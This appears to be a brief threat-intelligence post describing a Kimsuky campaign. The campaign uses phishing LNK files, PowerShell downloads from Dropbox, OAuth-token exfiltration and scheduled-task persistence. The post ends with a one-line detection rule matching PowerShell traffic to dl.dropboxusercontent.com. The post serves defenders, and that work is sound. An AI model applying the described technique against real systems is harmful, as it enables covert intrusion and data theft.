Kimsuky's Monolithic Werewolf: LNK & PowerShell Abusing Dropbox for Stealthy Attacks
A recent report on Kimsuky activity (tracked as Monolithic Werewolf) reveals that the adversary continues to distribute malicious LNK files and exploit PowerShell. This time, they are leveraging Dropbox in their attack chain. Despite the sophistication and multi-stage nature of the attack, there is a potential detection opportunity. Specifically, the activity involves using PowerShell to query the domain "dl.dropboxusercontent.com" to download the next stage of the attack.
The attack chain by Kimsuky begins with a phishing email containing a malicious .LNK file. When opened, this file executes PowerShell code to fetch and display a lure document from Dropbox while establishing persistence via a scheduled task. The process then involves reconnaissance, where PowerShell scripts gather system information and exfiltrate it to Dropbox. Attackers use OAuth tokens for seamless data exfiltration and maintain persistence through scheduled tasks, leveraging trusted platforms like Dropbox to bypass traditional security defenses and blend in with normal user behavior.
check commandline has 'powershell' and destinationaddress has "dl.dropboxusercontent.com"